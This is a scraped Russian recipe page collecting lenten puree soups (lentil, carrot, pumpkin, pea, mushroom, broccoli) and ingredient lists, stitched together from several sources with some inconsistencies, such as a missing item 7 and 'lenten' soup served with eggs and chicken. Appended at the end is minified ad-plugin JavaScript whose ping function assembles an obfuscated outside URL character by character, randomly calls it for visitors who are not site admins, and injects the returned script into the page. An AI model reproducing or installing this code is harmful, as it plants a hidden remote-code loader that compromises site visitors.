Постный суп пюре рецепт

Постные блюда: 8 витаминных супов-пюре

Во время поста популярны супы-пюре из разных овощей: из лука-порея, моркови, тыквы, гороха, грибов. Все они богаты витаминами и очень приятны на вкус. Как правило, к ним подают обжаренные на сковороде гренки. Если вы соблюдаете пост строго, то достаточно будет хлебушек просто подсушить. Если же допускаете послабления, то обжарьте его на растительном масле с добавлением специй.

1. Крем-суп с луком пореем

Понадобится:

  • 300 г зеленой чечевицы,
  • 4 луковицы,
  • 2 стебля лука-порея,
  • 3 клубня картофеля,
  • 1 лавровый лист,
  • 2 ст. ложки растительного масла,
  • 20 г зелени мяты,
  • соль, молотый белый перец по вкусу.

Приготовление:

  1. Чечевицу хорошо промойте, залейте 1 л горячей воды, положите лавровый лист и варите 1 час. Луковицы очистите и порубите. Лук-порей нарежьте ломтиками, картофель — кубиками.
  2. В сотейнике разогрейте растительное масло, положите лук, лук-порей и жарьте, помешивая, 5 минут. Добавьте картофель, закройте сотейник крышкой и держите на маленьком огне еще 7 минут. Посолите, поперчите, залейте 400 мл горячей воды и варите под крышкой на маленьком огне 15 минут.
  3. Суп протрите через сито или измельчите в блендере. Из чечевицы удалите лавровый лист и добавьте ее к получившемуся пюре.
  4. Мяту вымойте, обсушите и мелко нарежьте. Готовый крем-суп разлейте по тарелкам, в каждую положите нарезанную мяту и подайте на стол.

2. Суп-пюре из моркови

Понадобится:

  • 1 луковица,
  • 3 крупные моркови,
  • 1 корень петрушки,
  • 2 крупных клубня картофеля,
  • 50 мл растительного масла,
  • 500 мл овощного бульона,
  • по 20 г зелени петрушки и укропа,
  • соль, молотый черный перец по вкусу.

Приготовление:

  1. Лук измельчить, морковь и корень петрушки натереть на крупной терке. Картофель очистить от кожуры и нарезать небольшими кубиками.
  2. Овощи пассеровать на растительном масле в течение 10 минут. Влить 500 мл овощного бульона, приправить по вкусу и варить 15 минут.
  3. Суп пюрировать с помощью блендера. Петрушку и укроп перебрать, мелко нарезать. Суп посыпать зеленью перед подачей на стол.

3. Тыквенный крем-суп с морковью и орехами


Тыквенный крем-суп с морковью и орехами. Фото: К. Виноградов/BurdaMedia

Понадобится:

  • 300 г мякоти тыквы,
  • 2 моркови,
  • 1,5 л овощного бульона,
  • 2 ст. ложки растительного масла,
  • 50 г очищенного фундука,
  • 1 щепотка мускатного ореха,
  • веточки базилика для украшения,
  • соль, молотый белый перец.

Приготовление:

  1. Тыкву нарежьте ломтиками. Морковь вымойте, очистите и нарежьте кубиками. В кастрюле с толстыми стенками разогрейте растительное масло и слегка подрумяньте овощи.
  2. Влейте бульон и варите 10 минут. Затем измельчите в блендере, добавьте мускатный орех, посолите и поперчите.
  3. Орехи подрумяньте на сковороде без масла и нарубите. В каждую тарелку с супом добавьте орехи, украсьте листочками мяты и подайте на стол.

4. Гороховый суп-пюре

Понадобится:

  • 1 луковица,
  • 1 зубчик чеснока,
  • 1 ст. ложка растительного масла,
  • 600 г зеленого горошка,
  • 1 ч. ложка тертого имбиря,
  • 600 мл овощного бульона,
  • соль, молотый черный перец.

Приготовление:

  1. Лук и чеснок очистить, нарезать кубиками и пассеровать на растительном масле. Добавить зеленый горошек, имбирь и влить бульон. Варить 15 минут.
  2. Затем снять с огня, шумовкой отложить немного горошка, из остального супа сделать пюре, снова добавить горошек.
  3. Посолить, поперчить и разлить по тарелкам или суповым чашкам. Украсить свежей зеленью петрушки.

5. Грибной крем-суп

Понадобится:

  • 2 луковицы,
  • 2 ст. ложки постного масла,
  • 250 г лисичек,
  • 250 г подосиновиков или подберезовиков,
  • 600 мл овощного бульона,
  • 2 зубчика чеснока,
  • веточка петрушки и тимьяна,
  • соль, перец по вкусу,
  • пшеничные сухарики для подачи.

Приготовление:

  1. Лук и чеснок очистить, мелко нарезать. Веточку тимьяна вымыть, снять с нее листочки. В кастрюле разогреть растительное масло и обжарить лук, чеснок и листики тимьяна.
  2. Грибы промыть, очистить, нарезать и добавить к овощной зажарке. Обжаривать до полуготовности.
  3. В кастрюлю с грибами влить бульон и довести до кипения. Суп измельчить блендером. Петрушку вымыть, обсушить и мелко нарезать. Подавать с сухариками, посыпав рубленой петрушкой.

6. Крем-суп из шампиньонов


Крем-суп из шампиньонов. Фото: Дмитрий Королько/BurdaMedia

Понадобится:

  • 1 луковица,
  • 1 морковь,
  • 1 корень сельдерея,
  • 0,5 стебля лука-порея,
  • 400 г шампиньонов,
  • 600 мл овощного бульона,
  • по 50 г зелени петрушки и укропа,
  • 2 ст. ложки растительного масла,
  • сок 0,5 лимона,
  • соль, молотый черный перец по вкусу.

Приготовление:

  1. Лук очистите и мелко нарежьте. Морковь и корень сельдерея вымойте, очистите и нарежьте тонкой соломкой. Лук-порей почистите, нарежьте небольшими кружочками и промойте водой.
  2. Растительное масло разогрейте в глубокой сковороде, положите нарезанные лук, морковь, сельдерей, лук-порей и жарьте, помешивая, 5 минут.
  3. Грибы вымойте, почистите и нарежьте кубиками. Добавьте их к овощам и жарьте все вместе еще 10 минут на небольшом огне.
  4. Зелень укропа и петрушки промойте и обсушите. Несколько листочков петрушки отложите, остальную зелень мелко нарежьте.
  5. Бульон доведите до кипения, положите грибы и овощи, зелень и варите 15 минут.
  6. Суп протрите через сито, посолите, поперчите и приправьте лимонным соком. Украсьте блюдо зеленью петрушки.

8. Тыквенный крем-суп


Тыквенный крем-суп. Фото: К. Виноградов/BurdaMedia

Постный чечевичный суп пюре

Постный чечевичный суп пюре

Ингредиенты для приготовления постного чечевичного супа пюре

Ингредиенты для приготовления постного чечевичного супа пюре:

  1. Чечевица красная 2/3 стакана
  2. Картофель 4–5 штук (средний)
  3. Лук репчатый 1 штука
  4. Морковь 1–2 штуки
  5. Чеснок 3–4 зубца
  6. Масло растительное 2 столовые ложки
  7. Вода чистая дистиллированная 1 литр
  8. Соль по вкусу

Специи:

  1. Паприка пол чайной ложки
  2. Перец красный молоты на кончике ножа или по вкусу
  3. Перец черный по вкусу
  4. Перец душистый по вкусу
  5. Лист лавра измельченный щепотка
  6. Шалфей измельченный четверть чайной ложки
  • Основные ингредиенты
    Картофель, Лук, Морковь

    Порционность
    4 порции

    Кухня мира
    Американская кухня

    Инвентарь:

    Чайная ложка,
    Столовая ложка,
    Мерный стакан для воды,
    Глубокая кастрюля,
    Дуршлаг,
    Чайник,
    Нож,
    Разделочная доска,
    Бумажные кухонные полотенца,
    Плита,
    Кухонная лопатка,
    Сковорода,
    Глубокая миска,
    Тарелка – 2 штуки,
    Чеснокодавка,
    Пиала,
    Шумовка,
    Половник,
    Глубокая тарелка

    Приготовление постного чечевичного супа пюре:

    Шаг 1: подготавливаем чечевицу.

    Приготовить вкусный постный суп из чечевицы очень легко, зная несколько секретов обработки этих невероятно полезных зернобобовых. В первую очередь включаем плиту на сильный уровень, ставим на нее чайник с 1 литром чистой дистиллированной воды и доводим жидкость до кипения. Чечевицу перебираем, удаляем испорченные зерна, пересыпаем ее в дуршлаг с мелкой сеткой и промываем под приточной водой от пыли. Затем перекладываем ее в глубокую кастрюлю и заливаем 1 литром кипятка. Вымачиваем зернобобовые в течение 1 часа, а за это время подготавливаем все остальные ингредиенты, которые используются в приготовлении первого горячего постного блюда.

    Шаг 2: подготавливаем овощи.

    Репчатый лук, морковь и картофель чистим от кожуры острым ножом, срезая ее тонким слоем. Промываем овощи под холодной проточной водой от любого вида загрязнений и сушим их бумажными кухонными полотенцами от лишней влаги. После поочередно укладываем овощи на разделочную доску и измельчаем. Картофель кубиком или брусочками диаметром до 2 сантиметров, лук шинкуем кубиком диаметром до 1 сантиметра, а морковь натираем на крупной терке. Картофель кладем в глубокую миску и заливаем обычной проточной водой так, чтобы она полностью покрыла кусочки клубнеплодов, для того чтобы овощ не потемнел до начала приготовления супа. Остальные нарезанные ингредиенты раскладываем по отдельным тарелкам. Так же ставим на кухонный стол все необходимые специи, соль, растительное масло и в отдельную пиалу укладываем очищенные от кожуры зубчики чеснока.

    Шаг 3: варим чечевицу и картофель.

    Через 1 час кастрюлю с вымоченной чечевицей ставим на плиту, включенную на средний уровень. Вводим в емкость нарезанный картофель, предварительно слив с него воду. Варим ингредиенты в течение 15 минут, периодически снимая с отвара пенку с помощью шумовки. Время считается после закипания жидкости.

    Шаг 4: готовим заправку.

    Пока варятся основные составляющие супа, готовим заправку. Включаем плиту на средний уровень и ставим на нее сковороду с 2 столовыми ложками растительного масла. В разогретый жир закидываем измельченный лук и обжариваем его, помешивая кухонной лопаткой, до прозрачности и легкой золотистой корочки в течение 2 – 3 минут. После добавляем к луку морковь и жарим овощи вместе еще 3 минуты, пока морковь не примет золотистый оттенок и не смягчится. Затем снимаем сковороду с плиты и ставим ее на разделочную доску.

    Шаг 5: доводим суп до полной готовности.

    Через 10 минут чечевица начнет развариваться, а картофель дойдет до полуготовности. Еще через 5 минут масса в кастрюле станет напоминать пюре с кусочками картофеля. Именно в это время добавляем в кастрюлю заправку, все указанные в рецепте специи, по вкусу соль и туда же выдавливаем через чеснокодавку зубчики чеснока. Варим суп еще 8 — 10 минут до полной готовности. После выключаем плиту, измельчаем все ингредиенты блюда с помощью ручного блендера до состояния пюре, накрываем кастрюлю крышкой и даем первому горячему блюду настояться 5 – 7 минут. Затем помогая себе половником, разливаем суп по глубоким тарелкам и подаем к обеду.

    Шаг 6: подаем постный чечевичный суп пюре.

    Постный чечевичный суп пюре подается в горячем виде к обеденному столу. По желанию это великолепное первое блюдо можно дополнить свежей нашинкованной зеленью укропа, петрушки, шпината или зеленого лука. Так как это блюдо является постным его можно заправить постным майонезом из яблок и смаковать с постными хлебобулочными изделиями, которые готовятся без дрожжей, яиц и сливочных жиров. На вкус суп получается мягкий, нежный и очень ароматный. Готовьте и наслаждайтесь!
    Приятного аппетита!

    Советы к рецепту:

    – – Для того что чтобы суп был более насыщенный, по желанию в заправку можно добавить 1 столовую ложку пшеничной муки.

    – – Иногда в этот вид супа добавляют измельченное на терке яблоко или щавель.

    – – Набор специй в данном рецепте можно дополнить любыми другими приправами, которые подходят для приготовления блюд из зернобобовых или для супов.

    – – По желанию вы можете не готовить заправку, а сварить все овощи вместе до полной готовности в течение 20 – 25 минут. После заправить суп специями, солью, растительным маслом, измельчить до консистенции пюре и наслаждаться вкусным постным горячим блюдом!

    Постный овощной суп-пюре — прекрасное диетическое блюдо

    Предложенная статья подробно рассказывает, как в обычных домашних условиях собственноручно приготовить постный суп-пюре, обладающий массой полезных веществ и витаминов. Внимательно ознакомившись с рецептом, вы узнаете, какие ингредиенты и в каких пропорциях позволяют создать действительно полезное блюдо. Также познакомитесь с одной из самых простейших и быстрейших технологий изготовления данного супа-пюре. Помимо прочего, узнаете, с чем лучше всего подавать уже готовое подобное угощение.

    морковь 100 г
    репчатый лук 1 шт.
    стебель сельдерея 1 шт.
    лавровый лист 2 шт.
    чеснок 2 зубчика
    замороженная брокколи 400 г
    замороженный зеленый горошек 100 г
    бутилированная вода 2 л
    поваренная или морская соль по желанию
    молотая паприка 10 г
    молотый черный перец по желанию

    Пошаговое приготовление

    1. Первым делом заливаем в кастрюлю 2 лира бутилированной водой и отправляем ее на огонь кипятиться.
    2. Отмеряем 100 г моркови, а затем очищаем овощ от кожуры. Тщательно чистим и моем одну среднюю луковицу и один стебель сельдерея.
    3. Морковь разрезаем на несколько крупных кусочков и помещаем в кипящую воду.
    4. Стебель сельдерея делим пополам, после чего отправляем вслед за морковкой.
    5. Репчатый лук разрезаем на четыре части и также кладем в кастрюлю.
    6. Варим овощи на среднем огне до размягчения моркови.
    7. Добавляем туда же 400 г брокколи и 100 г зеленого горошка. Если вы используете замороженные брокколи и горошек, тогда обязательно разморозьте их естественным путем перед добавлением в овощной бульон.
    8. Закрываем кастрюлю крышкой и варим ее содержимое до полной готовности всех продуктов. В среднем на варку понадобится 5-7 минут с момента повторного закипания бульона.
    9. Тем временем очищаем от шелухи два зубчика чеснока, после чего разрезаем их пополам и отправляем к остальным продуктам. Провариваем овощи еще 1-2 минуты.
    10. Снимаем суп с плиты и позволяем ему слегка остыть.
    11. Извлекаем из бульона лавровый лист и при желании можно выбрать несколько овощей для украшения уже готового блюда. Рекомендую взять одно соцветие брокколи и несколько горошин.
    12. В отдельную емкость аккуратно сливаем овощной бульон.
    13. Оставшиеся продукты измельчаем при помощи погружного блендера до состояния пюре.
    14. В процессе измельчения небольшими порциями вливаем к овощам бульон и доводим суп-пюре до желаемой консистенции.
    15. Готовый суп солим, перчим по вкусу и добавляем 10 г молотой паприки.
    16. Хорошенько все размешиваем и раскладываем суп-пюре по тарелкам. Для украшения используем ранее извлеченные из бульона овощи.

    С чем подавать

    Согласно описанному рецепту получается очень вкусный, не наваристый, низкокалорийный суп-пюре, в котором содержится огромнейшее количество полезных веществ и витаминов. Данное блюдо превосходно справляется с годом и не нагружает желудок. В качестве дополнения к этому супу-пюре великолепно подойдут:

    • чесночные или сырные гренки из цельнозернового хлеба;
    • сваренные вкрутую яйца;
    • овсяные лепешки;
    • тосты с отварной куриной грудкой, тунцом или нежирной ветчиной;
    • абсолютно любые овощи-гриль;
    • оригинальные диетические закуски.

    Видеорецепт

    Предложенный видеоролик подробно продемонстрирует всю процедуру приготовления овощного постного супа-пюре по вышеописанной рецептуре.

    Постные супы

    Первые блюда во время поста — это практически незаменимая пища по нескольким причинам. Супы отлично усваиваются, а также супы – это не дегидрированная пища, что очень важно во время ограниченного питания. В этой подборке наши кулинары делятся рецептами постных супов на каждый день с фотографиями и пошаговыми инструкциями приготовления.

    Упорядочить рецепты по .

    Рецепты постных супов, 217 шт. в коллекции

    Ингредиенты

    Лук репчатый – 1 шт.

    Чеснок – 2 дольки

    Бульон куриный или вода – 0,5-1 л

    Базилик сухой – по вкусу

    Перец молотый – по вкусу

    Ингредиенты

    Картофель – 2 шт.

    Лук репчатый – 1 шт.

    Чеснок – 1 зубчик

    Бульон (овощной или куриный) – 1 литр

    Сливки (любой % жирности) – 250 мл.

    Растительное масло – 1 ст.л.

    Соль, черный молотый перец – по вкусу

    Паприка – для подачи

    Ингредиенты

    Чечевица (красная) – 2 ст.л.

    Лук репчатый – 1 шт.

    Чеснок – 2 зубчика

    Кинза – по вкусу

    Масло растительное – 2 ст.л.

    Перец красный жгучий – 0,5 ч.л.

    Перец чёрный молотый – 0,25 ч.л.

    Семена горчицы – 0,5 ч.л.

    Смесь перцев – по вкусу

    Порошок манго – 2 ч.л.

    Ингредиенты

    Чечевица красная или желтая – 1,5 стакана;

    Морковь – 3 штуки;

    Чеснок – 1 небольшая головка;

    Молотый кориандр – 1 чайная ложка;

    Сухие ароматные травы – 1-2 ч. ложка;

    Молотые перцы по вкусу;

    Бульон или вода – 4-5 стаканов;

    Оливковое масло для жарки.

    Ингредиенты

    Тыква свежая – 400 грамм;

    Морковь – 1 штука;

    Лук репчатый – 1 штука;

    Картофель – 2 штуки;

    Масло подсолнечное – 40 мл;

    Сливки 10% – 100 мл;

    Чеснок – 2 зубчика;

    Перец черный молотый – по вкусу;

    Сухарики мелкие – 150 грамм.

    Ингредиенты

    Баклажаны – 2 шт.

    Чечевица красная – 70 г

    Лук репчатый – 1 шт.

    Чеснок – 2 дольки

    Помидоры в собственном соку – 1 банка (400 г.)

    Соль, перец – по вкусу

    Лавровый лист – 1 шт.

    Базилик – 1 пучок

    Ингредиенты

    Колотый горох – 1 стакан

    Картофель – 2 шт

    Майонез – по вкусу

    Аджика – по вкусу

    Ингредиенты

    Картофель – 250 г

    Лук репчатый – 1 шт.

    Болгарский перец – 0,5 шт.

    Горошек зеленый – 50 г

    Растительное масло – 2 ст.л.

    Томаты в собственном соку – 2 ст.л.

    Соль и черный молотый перец – по вкусу

    Ингредиенты

    Чечевица красная – 1,5 стакана;

    Томатная паста – 2 ст.л;

    Мука – 1 ст. ложка;

    Орегано – по вкусу;

    Базилик – по вкусу;

    Перец красный острый – по вкусу;

    Оливковое масло – 3 ст. ложки;

    Ингредиенты

    Картофель – 2 шт.

    Лук репчатый – 0,5 шт.

    Перец сладкий – 0,5 шт.

    Помидоры в собственном соку – 3 ст. л.

    Нерафинированное подсолнечное масло – 3 ст. л.

    Чеснок – 1 зубчик

    Соль, перец – по вкусу

    Лавровый лист – 1 шт.

    Зелень – по вкусу

    Ингредиенты

    Фасоль: 200 грамм;

    Капуста: 250 грамм

    Картофель: 1-2 шт;

    Лук репчатый: 1 шт;

    Томатная паста: 1 столовая ложка;

    Растительное масло: 4 столовые ложки;

    Сахар: 2 чайные ложки;

    Уксус столовый: 0,5 чайной ложки;

    Черный перец горошком 6-8 шт;

    Лавровый лист: 2 шт;

    Соль: 1,5 чайные ложки.

    Ингредиенты

    Картофель – 3 шт.

    Лук репчатый – 1 шт.

    Чеснок – 2 дольки

    Подсолнечное рафинированное масло – для жарки овощей

    Соль, перец – по вкусу

    Ингредиенты

    Чечевица красная – 150 грамм;

    Помидоры – 2 шт. (маленьких);

    Чеснок – 2 зубчика;

    Растительное масло – 2 ст.л;

    Паприка кусочками сушеная – 1 ч.л;

    Мята – 5 листиков;

    Розмарин – по вкусу;

    Оливки для подачи;

    Кунжут по желанию.

    Ингредиенты

    Картофель – 4 шт.

    Огурцы солёные – 3 шт.

    Лук репчатый – 1 шт.

    Чеснок – 2 зубчика

    Рис – 0.5-1 стакан

    Подсолнечное масло – для жарки

    Лавровый лист – 1-2 шт.

    Рассол огуречный – 0.5-1 стакан

    Перец, соль – по вкусу

    Томатная паста – 1-1.5 ст.л.

    Ингредиенты

    Перловая крупа – 0,5 стакана

    Грибы замороженные – 300-400 г

    Картофель – 3 шт. (по желанию)

    Лук репчатый – 1 головка

    Морковь – 0,5-1 штука

    Томатный соус – 1-2 ст. ложки (по желанию)

    Оливковое масло – для жарки

    Ингредиенты

    Томатный сок – 1000 мл

    Травы, соль, перец – по вкусу

    Ингредиенты

    Картофель – 2 шт.

    Морковь небольшая – 1 шт.

    Шампиньоны – 100 г

    Свекла небольшая – 1 шт.

    Растительное масло – 2 ст.л.

    Овощной бульонный кубик – 1 шт.

    Томатная паста – 1 ст.л.

    Капуста белокочанная – 150 г

    Болгарский перец – 0,5 шт.

    Чеснок – 1 зубок

    Зелень укропа и петрушки – 10 г

    Ингредиенты

    Овощной бульон – 1,3-1,5 литра;

    Томаты в собственном соку – 400 г.;

    Фасоль консервированная (белая) – 300 г.;

    Сельдерей – 2 стебля;

    Лук репчатый – 1 шт.;

    Чеснок – 2 зубчика;

    Лавровый лист – 2 шт.;

    Соль – 1 ч.л. (без горки);

    Черный молотый перец – 0,5 ч.л.;

    Зелень – для подачи.

    Ингредиенты

    Фасоль сухая белая – 1,5 стакана;

    Морковь – 1 штука;

    Лук репчатый – 1 штука;

    Картофель – 2 штуки;

    Масло подсолнечное рафинированное – 50 миллилитров;

    Перец черный молотый – по вкусу;

    Зелень – 10 грамм.

    Ингредиенты

    Чечевица – 120 г

    Лук репчатый – 1 шт.

    Масло растительное – 2 ст.л.

    Зелень – по вкусу

    Соль, специи – по вкусу

    Ингредиенты

    Лук репчатый – 1 шт.

    Сельдерей – 2 черешка

    Перец сладкий – 1 шт.

    Помидолры – 3 шт.

    Чеснок – 3 дольки

    Масло оливковое – 3 ст.л.

    Соль, перец – по вкусу

    Вода – по вкусу (ориентируйтесь на желаемую густоту)

    Ингредиенты

    Картофель (очищенный) – 450 г

    Тыква (замороженная) – 120 г

    Морковь (очищенная) – 50 г

    Пряности – по вкусу

    Имбирь свежий – 7 г

    Масло растительное – 1 ст.л.

    Ингредиенты

    Перец зеленый – 1 шт.

    Укроп – по вкусу

    Петрушка – по вкусу

    Зеленый лук – по вкусу

    Перец черный – по вкусу

    Лавровый лист – 1 шт.

    Ингредиенты

    Лук репчатый – 0.5 шт.

    Картофель – 1 маленький

    Чеснок – 1 зубчик

    Масло растительное – 1 ст.л.

    Зелень – для подачи

    Хлеб для сухариков – 2-3 ломтика

    Ингредиенты

    Перловая крупа – 100 г

    Картофель – 2 шт.

    Лук репчатый – 1 шт.

    Огурцы солёные – 1-2 шт.

    Чеснок – 1 зубчик

    Соль, специи, зелень – по вкусу

    Ингредиенты

    Фасоль белая – 150 грамм;

    Лук репчатый – 1 шт;

    Картофель – 4-5 шт;

    Укроп – 0.5 пучка;

    Соль,перец – по вкусу;

    Подсолнечное масло – для жарки.

    Ингредиенты

    Красная чечевица – 1 стакан;

    Лук репчатый – 1 шт;

    Тыква – 250-300 грамм;

    Тимьян сухой – 0.5 ч.л;

    Смесь перцев – по вкусу;

    Оливковое масло – 3 ст.л.

    Ингредиенты

    Чечевица красная – 1 стакан;

    Шампиньоны – 300 грамм;

    Лук репчатый – 1 шт;

    Специи (орегано, базилик, лавровый лист, душистый перец) – по вкусу;

    Петрушка – небольшой пучок.

    Ингредиенты

    Картофель – 400 грамм

    Гречневая крупа – 200 грамм

    Лук репчатый – 1 шт.

    Масло подсолнечное – 25 грамм

    Петрушка – 3 веточки

    Перец чёрный молотый – по вкусу

    Лавровый лист – 2 шт.

    Ингредиенты

    Брокколи – 500 г

    Картошка – 150 г

    Кокосовое молоко – 100 мл

    Креветки, соль – по вкусу

    Поделитесь коллекцией рецептов с друзьями

    АЙМКУК © 2007-2020 год. Все права защищены.
    Использование материалов сайта без письменного разрешения, запрещено законом об Авторских правах Гражданского Кодекса Российской Федерации от 18 декабря 2006 года N 230-ФЗ

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};